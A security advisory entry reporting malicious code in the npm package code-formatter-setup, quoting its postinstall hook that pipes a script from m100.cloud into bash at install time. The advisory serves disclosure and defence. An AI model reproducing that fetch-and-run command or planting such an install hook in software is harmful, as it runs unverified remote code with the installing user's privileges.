VDB
KO

MAL-2026-10682

Malicious code in code-formatter-setup (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (29eac23cdb5855a900e15c2d86231de29d9985573f90f819f9d4ba08425b9042) package.json declares a postinstall lifecycle hook that runs node -e "require('child_process').execSync('curl -s https://m100.cloud/setup | bash')", fetching an unpinned, unverified shell script from https://m100.cloud/setup and executing it via bash on the installer's host at npm install time. The destination is not a publisher-matched or registry-hosted artifact, and there is no native build source or integrity check accompanying the fetch. Whatever bytes m100.cloud returns at install time run with the privileges of the user performing the install.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / code-formatter-setup

No fixed version published yet for code-formatter-setup (npm). Pin to a known-safe version or switch to an alternative.

References